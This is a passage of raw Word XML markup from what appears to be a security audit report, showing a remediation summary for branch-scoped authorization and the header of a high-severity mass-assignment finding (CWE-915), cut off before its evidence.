                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="457200" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="447675" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="450305" y="0"/>
                                  <a:pt x="452550" y="930"/>
                                  <a:pt x="454410" y="2784"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="456270" y="4645"/>
                                  <a:pt x="457200" y="6890"/>
                                  <a:pt x="457200" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="457200" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="457200" y="126454"/>
                                  <a:pt x="456270" y="128699"/>
                                  <a:pt x="454410" y="130559"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="452550" y="132420"/>
                                  <a:pt x="450305" y="133350"/>
                                  <a:pt x="447675" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="133350"/>
                                  <a:pt x="4650" y="132420"/>
                                  <a:pt x="2790" y="130559"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="128699"/>
                                  <a:pt x="0" y="126454"/>
                                  <a:pt x="0" y="123825"/>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75F4CDD" id="Group 25909" o:spid="_x0000_s1026" style="position:absolute;margin-left:131.95pt;margin-top:-.8pt;width:36pt;height:10.5pt;z-index:-251458560" coordsize="4572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c6SwMAAJ4JAAAOAAAAZHJzL2Uyb0RvYy54bWykVslu2zAQvRfoPwi6N7IWy7YQO0Cb5VK0&#10;QZN+AENRlgBJFEjasvv1HY5EanEQtIkPMslZ35vhcn1zqkrnyIQseL11/auF67Ca8rSo91v39/P9&#10;l7XrSEXqlJS8Zlv3zKR7s/v86bptEhbwnJcpEw44qWXSNls3V6pJPE/SnFVEXvGG1SDMuKiIgqnY&#10;e6kgLXivSi9YLGKv5SJtBKdMSli97YTuDv1nGaPqZ5ZJppxy60JuCr8Cvy/66+2uSbIXpMkL2qdB&#10;3pFFRYoaglpXt0QR5yCKC1dVQQWXPFNXlFcez7KCMsQAaPzFDM2D4IcGseyTdt9YmoDaGU/vdkt/&#10;HB9E89Q8CmCibfbABc40llMmKv0PWTonpOxsKWMn5VBYjJYrKIPrUBD5YRgue0ppDrxfWNH87k07&#10;zwT1Jqm0DTSHHPDLj+F/yknDkFaZAP5H4RTp1t1EoevUpIImRQVHLyApqGUpkokEtj7Gj8VJEnqQ&#10;6oFxJJocv0vVdWRqRiQ3I3qqzVBAX7/Z0Q1R2k5nqYdOO1Qqt4XS0oof2TNHPaXLtVkGS9cxdYY8&#10;B4WyHitG0SpeTVWNAj28FPQr+zNRXy7CxUgd8sJ4EcSDntERN2HfO0YSRX4nCVbrSJcC0pn6ns6M&#10;XRysOrsojpbdDjeirlkhWLzezKJZEVLwWjSD78KZH4RroK2zMVqv52aj+AEkh6gGKmzifrCON5tp&#10;6pYNH4hcovAf+bAM+2EQBTPYtizj3dsjHEo8CC9iGrydje2fiYXReY0TqETXF4OFZSTuW+My8WAF&#10;9dNd859s6CZDswuGzfq8LGZ9VOIpDAOuI6BTH/WQEU+NxsrzXjQ5ztvXYv6//WBInO0vy/ukIWz9&#10;cPWi2LTkknV9rs8V3JL2rEHt4TQra33sAB+UwMWelUThDVkVCm78sqigdrBR4fIw+wa86ZO+O15x&#10;pM4l02dTWf9iGZzSeAvpBSn2L99K4RyJvtfxh85J2eSkX+399qqYKvrR9llRltalj6YTl3e398F9&#10;3HvolbUdwyeFtVx0lrTPpntXwO0MoM3rAkixRhiZ18ra1/AmwiAjtHr4wtMz3shICFx9SA0+AhBH&#10;/2DRr4zxHLWGZ9XuLwAAAP//AwBQSwMEFAAGAAgAAAAhACNW/ojgAAAACQEAAA8AAABkcnMvZG93&#10;bnJldi54bWxMj8FKw0AQhu+C77CM4K3dpLHBxmxKKeqpCLaCeNtmp0lodjZkt0n69o4ne5yZj3++&#10;P19PthUD9r5xpCCeRyCQSmcaqhR8Hd5mzyB80GR06wgVXNHDuri/y3Vm3EifOOxDJTiEfKYV1CF0&#10;mZS+rNFqP3cdEt9Orrc68NhX0vR65HDbykUUpdLqhvhDrTvc1lie9xer4H3U4yaJX4fd+bS9/hyW&#10;H9+7GJV6fJg2LyACTuEfhj99VoeCnY7uQsaLVsEiTVaMKpjFKQgGkmTJiyOTqyeQRS5vGxS/AAAA&#10;//8DAFBLAQItABQABgAIAAAAIQC2gziS/gAAAOEBAAATAAAAAAAAAAAAAAAAAAAAAABbQ29udGVu&#10;dF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhADj9If/WAAAAlAEAAAsAAAAAAAAAAAAAAAAALwEA&#10;AF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAMUHNzpLAwAAngkAAA4AAAAAAAAAAAAAAAAALgIA&#10;AGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhACNW/ojgAAAACQEAAA8AAAAAAAAAAAAAAAAA&#10;pQUAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPMAAACyBgAAAAA=&#10;">
                <v:shape id="Shape 943" o:spid="_x0000_s1027" style="position:absolute;width:457200;height:133350;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="457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LfxgAAANwAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;FITvhf6H5RV6q5sakZq6SilYxIOg5tDcXrOvSdrs25BdzfrvXUHwOMzMN8x8GUwrTtS7xrKC11EC&#10;gri0uuFKQX5YvbyBcB5ZY2uZFJzJwXLx+DDHTNuBd3Ta+0pECLsMFdTed5mUrqzJoBvZjjh6v7Y3&#10;6KPsK6l7HCLctHKcJFNpsOG4UGNHnzWV//ujUfD9036F6awY/ooq35TbNB2KwEo9P4WPdxCegr+H&#10;b+21VjCbpHA9E4+AXFwAAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAA&#10;AAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAA&#10;CwAAAAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEA4hUi38YAAADcAAAA&#10;DwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPoCAAAAAA==&#10;" path="m9525,l447675,v2630,,4875,930,6735,2784c456270,4645,457200,6890,457200,9525r,114300c457200,126454,456270,128699,454410,130559v-1860,1861,-4105,2791,-6735,2791l9525,133350v-2630,,-4875,-930,-6735,-2791c930,128699,,126454,,123825l,9525c,6890,930,4645,2790,2784,4650,930,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,457200,133350"/>
                </v:shape>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Applied to 13 lookups </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">plus the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>index(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> listings</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">, since fixing only the </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{id}</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> handlers would have leaked the same data in bulk.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6970022F" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
      <w:pPr>
        <w:spacing w:after="101"/>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Cross-branch reads → 404. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Own-branch</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> → 200. Administrator → sees all. Listing endpoints scoped. Orphaned </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>user sees</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> nothing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10996335" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
      <w:pPr>
        <w:spacing w:after="101"/>
        <w:ind w:left="24" w:right="16"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="532068E4" w14:textId="77777777" w:rsidR="00E868FD" w:rsidRDefault="00E868FD" w:rsidP="00CA733A">
      <w:pPr>
        <w:spacing w:after="101"/>
        <w:ind w:left="24" w:right="16"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E9992F7" w14:textId="77777777" w:rsidR="00E868FD" w:rsidRDefault="00E868FD" w:rsidP="00CA733A">
      <w:pPr>
        <w:spacing w:after="101"/>
        <w:ind w:left="24" w:right="16"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A0F4AD4" w14:textId="77777777" w:rsidR="00E868FD" w:rsidRDefault="00E868FD" w:rsidP="00CA733A">
      <w:pPr>
        <w:spacing w:after="101"/>
        <w:ind w:left="24" w:right="16"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="513A8F0E" w14:textId="77777777" w:rsidR="00E868FD" w:rsidRDefault="00E868FD" w:rsidP="00CA733A">
      <w:pPr>
        <w:spacing w:after="101"/>
        <w:ind w:left="24" w:right="16"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C6AB782" w14:textId="77777777" w:rsidR="00E868FD" w:rsidRDefault="00E868FD" w:rsidP="00CA733A">
      <w:pPr>
        <w:spacing w:after="101"/>
        <w:ind w:left="24" w:right="16"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="261CD928" w14:textId="77777777" w:rsidR="00E868FD" w:rsidRDefault="00E868FD" w:rsidP="00CA733A">
      <w:pPr>
        <w:spacing w:after="101"/>
        <w:ind w:left="24" w:right="16"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BB9B460" w14:textId="77777777" w:rsidR="00E868FD" w:rsidRPr="005C54CB" w:rsidRDefault="00E868FD" w:rsidP="00CA733A">
      <w:pPr>
        <w:spacing w:after="101"/>
        <w:ind w:left="24" w:right="16"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2085AE36" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="0"/>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V-04 · Mass assignment erased customer debt and rewrote business keys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B6F4DF" w14:textId="77777777" w:rsidR="00E868FD" w:rsidRDefault="00E868FD" w:rsidP="00E868FD">
      <w:pPr/>
    </w:p>
    <w:p w14:paraId="437919AB" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRPr="005C54CB" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
      <w:pPr>
        <w:spacing w:after="224"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76FE5323" wp14:editId="15C8506A">
                <wp:extent cx="6480126" cy="1658026"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="26229" name="Group 26229"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="6480126" cy="1658026"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="6480126" cy="1658026"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1118" name="Shape 1118"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="505501"/>
                            <a:ext cx="6480126" cy="714375"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="6480126" h="714375">
                                <a:moveTo>
                                  <a:pt x="19050" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="6467474" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6470001" y="0"/>
                                  <a:pt x="6472430" y="477"/>
                                  <a:pt x="6474764" y="1445"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="6480126" y="5028"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6480126" y="709335"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6474764" y="712918"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6472430" y="713885"/>
                                  <a:pt x="6470001" y="714369"/>
                                  <a:pt x="6467474" y="714375"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="19050" y="714375"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="16524" y="714369"/>
                                  <a:pt x="14094" y="713885"/>
                                  <a:pt x="11760" y="712918"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="9426" y="711950"/>
                                  <a:pt x="7366" y="710574"/>
                                  <a:pt x="5580" y="708788"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="3793" y="707002"/>
                                  <a:pt x="2417" y="704937"/>
                                  <a:pt x="1450" y="702605"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="695325"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="19050"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1450" y="11751"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="2417" y="9413"/>
                                  <a:pt x="3793" y="7355"/>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122" name="Rectangle 1122"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="587607" cy="148357"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="4B31264C" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRPr="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                                <w:rPr>
                                  <w:color w:val="auto"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r w:rsidRPr="00CA733A">
                                <w:rPr>
                                  <w:b/>
                                  <w:color w:val="auto"/>
                                </w:rPr>
                                <w:t>OWASP</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1123" name="Rectangle 1123"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="441871" y="0"/>
                            <a:ext cx="1711337" cy="148357"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="37970B86" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:t xml:space="preserve"> A08:2021 / API6:2023 · </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1124" name="Rectangle 1124"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1728639" y="0"/>
                            <a:ext cx="684180" cy="148357"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="38A1EC52" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRPr="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                                <w:rPr>
                                  <w:color w:val="auto"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r w:rsidRPr="00CA733A">
                                <w:rPr>
                                  <w:b/>
                                  <w:color w:val="auto"/>
                                </w:rPr>
                                <w:t>CWE-915</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1125" name="Rectangle 1125"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2243137" y="0"/>
                            <a:ext cx="140273" cy="148357"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="36F3DB0F" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:t xml:space="preserve"> · </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1126" name="Rectangle 1126"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2348657" y="0"/>
                            <a:ext cx="350683" cy="148357"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="44279D0D" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRPr="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                                <w:rPr>
                                  <w:color w:val="auto"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r w:rsidRPr="00CA733A">
                                <w:rPr>
                                  <w:b/>
                                  <w:color w:val="auto"/>
                                </w:rPr>
                                <w:t>High</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1127" name="Rectangle 1127"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="257175"/>
                            <a:ext cx="736976" cy="148357"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="3EC0C3F4" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:b/>
                                  <w:color w:val="0B2D56"/>
                                </w:rPr>
                                <w:t>Evidence.</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1128" name="Rectangle 1128"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="554236" y="257175"/>
                            <a:ext cx="43855" cy="148357"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="042A4561" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:t xml:space="preserve"> </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1129" name="Shape 1129"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="590550" y="248326"/>
                            <a:ext cx="1562100" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="1562100" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1552575" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1555205" y="0"/>
                                  <a:pt x="1557450" y="924"/>
                                  <a:pt x="1559310" y="2784"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1561170" y="4645"/>
                                  <a:pt x="1562100" y="6890"/>
                                  <a:pt x="1562100" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="1562100" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1562100" y="126454"/>
                                  <a:pt x="1561170" y="128699"/>
                                  <a:pt x="1559310" y="130559"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1557450" y="132414"/>
                                  <a:pt x="1555205" y="133344"/>
                                  <a:pt x="1552575" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="133344"/>
                                  <a:pt x="4650" y="132414"/>
                                  <a:pt x="2790" y="130559"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
